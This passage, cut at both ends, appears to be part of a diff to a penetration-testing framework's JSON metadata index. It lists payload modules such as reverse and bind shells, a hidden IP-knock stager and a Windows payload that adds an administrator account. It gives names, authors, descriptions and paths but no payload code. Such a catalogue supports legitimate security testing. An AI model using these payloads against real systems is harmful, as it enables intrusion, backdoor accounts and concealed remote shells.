"Ruby", + "arch": "ruby", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 19:02:28 +0000", + "path": "/modules/payloads/singles/ruby/pingback_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "ruby/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/shell_bind_tcp": { + "name": "Ruby Command Shell, Bind TCP", + "fullname": "payload/ruby/shell_bind_tcp", + "aliases": 
[], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn ", + "hdm " + ], + "description": "Continually listen for a connection and spawn a command shell via Ruby", + "references": [], + "platform": "Ruby", + "arch": "ruby", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/ruby/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "ruby/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/shell_bind_tcp_ipv6": { + "name": "Ruby Command Shell, Bind TCP IPv6", + "fullname": "payload/ruby/shell_bind_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn ", + "hdm " + ], + "description": "Continually listen for a connection and spawn a command shell via Ruby", + "references": [], + "platform": "Ruby", + "arch": "ruby", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb", + "is_install_path": true, + "ref_name": "ruby/shell_bind_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/shell_reverse_tcp": { + "name": "Ruby Command Shell, Reverse TCP", + "fullname": "payload/ruby/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn ", + "hdm " + ], + "description": "Connect back and create a command shell via Ruby", + "references": [], + "platform": "Ruby", + "arch": "ruby", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/ruby/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "ruby/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/shell_reverse_tcp_ssl": { + "name": "Ruby Command Shell, Reverse TCP SSL", + "fullname": "payload/ruby/shell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Connect back and create a command shell via Ruby, uses SSL", + "references": [], + "platform": "Ruby", + "arch": "ruby", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "ruby/shell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/sparc/shell_bind_tcp": { + "name": "Solaris Command Shell, Bind TCP Inline", + "fullname": "payload/solaris/sparc/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Solaris", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "solaris/sparc/shell_bind_tcp", + "check": false, + "post_auth": 
false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/sparc/shell_find_port": { + "name": "Solaris Command Shell, Find Port Inline", + "fullname": "payload/solaris/sparc/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Solaris", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/sparc/shell_find_port.rb", + "is_install_path": true, + "ref_name": "solaris/sparc/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/sparc/shell_reverse_tcp": { + "name": "Solaris Command Shell, Reverse TCP Inline", + "fullname": "payload/solaris/sparc/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Solaris", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "solaris/sparc/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/x86/shell_bind_tcp": { + "name": "Solaris Command Shell, Bind TCP Inline", + "fullname": 
"payload/solaris/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Solaris", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "solaris/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/x86/shell_find_port": { + "name": "Solaris Command Shell, Find Port Inline", + "fullname": "payload/solaris/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Solaris", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/x86/shell_find_port.rb", + "is_install_path": true, + "ref_name": "solaris/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/x86/shell_reverse_tcp": { + "name": "Solaris Command Shell, Reverse TCP Inline", + "fullname": "payload/solaris/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Solaris", 
+ "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "solaris/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_tty/unix/interact": { + "name": "Unix TTY, Interact with Established Connection", + "fullname": "payload/tty/unix/interact", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Interacts with a TTY on an established socket connection", + "references": [], + "platform": "Unix", + "arch": "tty", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/tty/unix/interact.rb", + "is_install_path": true, + "ref_name": "tty/unix/interact", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/adduser": { + "name": "Windows Execute net user /ADD", + "fullname": "payload/windows/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm ", + "Chris John Riley", + "vlad902 ", + "sf " + ], + "description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": 
null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/adduser.rb", + "is_install_path": true, + "ref_name": "windows/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/custom/bind_hidden_ipknock_tcp": { + "name": "Windows shellcode stage, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/custom/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Custom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/custom/bind_hidden_tcp": { + "name": "Windows shellcode stage, Hidden Bind TCP Stager", + "fullname": "payload/windows/custom/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Custom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/custom/bind_ipv6_tcp": { + 
"name": "Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/custom/bind_ipv6_tcp_uuid": { + "name": "Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + 
"stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/custom/bind_named_pipe": { + "name": "Windows shellcode stage, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "UserExistsError" + ], + "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/custom/bind_nonx_tcp": { + "name": "Windows shellcode stage, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/custom/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "vlad902 " + ], + "description": "Custom shellcode stage.\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + 
"stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/custom/bind_tcp": { + "name": "Windows shellcode stage, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Custom shellcode stage.\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/custom/bind_tcp_rc4": { + "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + 
"stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/custom/bind_tcp_uuid": { + "name": "Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/custom/find_tag": { + "name": "Windows shellcode stage, Find Tag Ordinal Stager", + "fullname": "payload/windows/custom/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "skape " + ], + "description": "Custom shellcode stage.\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/custom/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": 
"windows/findtag_ord" + }, + "payload_windows/custom/reverse_http": { + "name": "Windows shellcode stage, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm " + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_http" + }, + "payload_windows/custom/reverse_http_proxy_pstore": { + "name": "Windows shellcode stage, Reverse HTTP Stager Proxy", + "fullname": "payload/windows/custom/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm " + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + 
"stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_windows/custom/reverse_https": { + "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)", + "fullname": "payload/windows/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm " + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_https" + }, + "payload_windows/custom/reverse_ipv6_tcp": { + "name": "Windows shellcode stage, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/custom/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": 
"windows/custom", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/custom/reverse_named_pipe": { + "name": "Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_windows/custom/reverse_nonx_tcp": { + "name": "Windows shellcode stage, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/custom/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "vlad902 " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + 
"staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/custom/reverse_ord_tcp": { + "name": "Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/custom/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "spoonm " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/custom/reverse_tcp": { + "name": "Windows shellcode stage, Reverse TCP Stager", + "fullname": "payload/windows/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": 
"windows/custom", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/custom/reverse_tcp_allports": { + "name": "Windows shellcode stage, Reverse All-Port TCP Stager", + "fullname": "payload/windows/custom/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Custom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/custom/reverse_tcp_dns": { + "name": "Windows shellcode stage, Reverse TCP Stager (DNS)", + "fullname": "payload/windows/custom/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/custom/reverse_tcp_rc4": { + "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/custom/reverse_tcp_rc4_dns": { + "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/custom/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_tcp_rc4_dns", + 
